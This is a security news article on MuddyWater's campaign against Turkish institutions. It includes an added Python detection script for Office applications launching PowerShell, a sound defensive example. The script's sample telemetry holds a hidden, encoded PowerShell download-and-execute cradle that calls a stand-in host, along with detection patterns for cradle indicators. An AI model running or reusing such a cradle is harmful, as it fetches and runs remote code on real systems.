MuddyWater APT linked to the recent attacks against Turkey

February 22, 2022

Researchers have observed a new threat campaign targeting Turkish government institutions and private organisations, and have attributed it to the Iranian advanced persistent threat group MuddyWater.

According to the researchers, MuddyWater uses malicious Microsoft Office documents and PDF files as the initial infection vector of these attacks.

The malicious documents impersonate legitimate correspondence from the Turkish Health and Interior Ministries. The campaign uses malicious XLS files, PDFs, and Windows executables to drop PowerShell-based downloaders, which give the attackers an initial foothold in the targeted network.

The PowerShell downloaders run a chain of scripts that fetch additional payloads. The threat actors also embedded canary tokens, callback URLs that are requested when a stage executes, so that a hit on the token signals a successful infection by the malicious artefacts. The researchers note that the tokens may additionally help the attackers tell real victims apart from sandboxes or AV analysis environments, for example from the timing or source of the callback.
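The chain described above, an Office document spawning a PowerShell download cradle, is the point at which a defender can most reliably catch it. The following detection logic is an added example written for this page, not code from the researchers' report or from the campaign itself. It runs over constructed, Sysmon-style process-creation records (pipe-separated key=value fields; the field names, paths and the `example.invalid` URL are assumptions), decodes any `-EncodedCommand` argument, and scores the event on an Office parent process plus the usual cradle indicators.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample telemetry (not real campaign data). The encoded PowerShell
# argument is built from a plaintext download cradle so the example is self-contained.
CRADLE_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1')"
ENCODED_CRADLE = base64.b64encode(CRADLE_PLAINTEXT.encode("utf-16-le")).decode("ascii")

SAMPLE_LOG = [
    # Excel spawning a hidden, encoded PowerShell download cradle (should alert)
    r"EventID=1|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    f"|CommandLine=powershell.exe -nop -w hidden -ep bypass -enc {ENCODED_CRADLE}",
    # Ordinary admin script launched from Explorer (should not alert)
    r"EventID=1|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    # Excel spawning cmd.exe: out of scope for this PowerShell-focused rule
    r"EventID=1|Image=C:\Windows\System32\cmd.exe"
    r"|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
    r"|CommandLine=cmd.exe /c echo hi",
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}

# Indicators typical of PowerShell download cradles; the cradle itself weighs most.
CRADLE_PATTERNS = {
    "download cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "policy bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
}
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class Finding:
    line_no: int
    score: int
    reasons: List[str] = field(default_factory=list)


def parse_event(line: str) -> Dict[str, str]:
    """Split 'k=v|k=v' into a dict; only the first '=' per field separates key and value."""
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell's -EncodedCommand is base64 over UTF-16LE; return the plaintext or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(fields: Dict[str, str]) -> Tuple[int, List[str]]:
    """Score a process-creation event; only PowerShell children are considered."""
    reasons: List[str] = []
    score = 0
    if basename(fields.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return 0, reasons
    parent = basename(fields.get("ParentImage", ""))
    if parent in OFFICE_PARENTS:
        score += 3
        reasons.append(f"office parent {parent}")
    cmdline = fields.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        score += 1
        reasons.append("encoded command")
    # Match indicators against both the raw command line and the decoded payload.
    text = cmdline + "\n" + (decoded or "")
    for name, pattern in CRADLE_PATTERNS.items():
        if pattern.search(text):
            score += 3 if name == "download cradle" else 1
            reasons.append(name)
    return score, reasons


def detect(lines: List[str], threshold: int = 3) -> List[Finding]:
    """Return one Finding per event whose score reaches the threshold."""
    findings = []
    for n, line in enumerate(lines, 1):
        score, reasons = score_event(parse_event(line))
        if score >= threshold:
            findings.append(Finding(n, score, reasons))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"line {f.line_no}: score {f.score}: {', '.join(f.reasons)}")
```

The threshold is set so that an Office parent alone is enough to alert, which is the right default for most fleets where Excel or Word should never launch PowerShell; the benign `-NoProfile -File` launch from Explorer scores below it. Decoding the encoded command matters because the cradle keywords are otherwise invisible in the raw command line.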

Researchers attributed the campaign to MuddyWater because several technical indicators match the group's established infection chain, and the tactics, techniques, and procedures used against the Turkish targets overlap with TTPs previously documented for the group.

Moreover, code and metadata similarities between the scripts and malicious documents used in this campaign and previously published MuddyWater artefacts and tools strengthen the attribution.

The infection chain also resembles one documented by researchers in 2020, and an indicator of compromise observed as a core part of this chain had already been seen in earlier MuddyWater campaigns.

MuddyWater runs campaigns worldwide, and both their volume and their severity are increasing as the group refines its tools and tradecraft. Organisations should therefore rely on layered, defence-in-depth controls rather than a single product: blocking macro-enabled documents from untrusted sources, constraining or logging PowerShell execution, alerting when Office applications spawn script interpreters, and monitoring outbound connections to unexpected hosts all address stages of the chain described above.
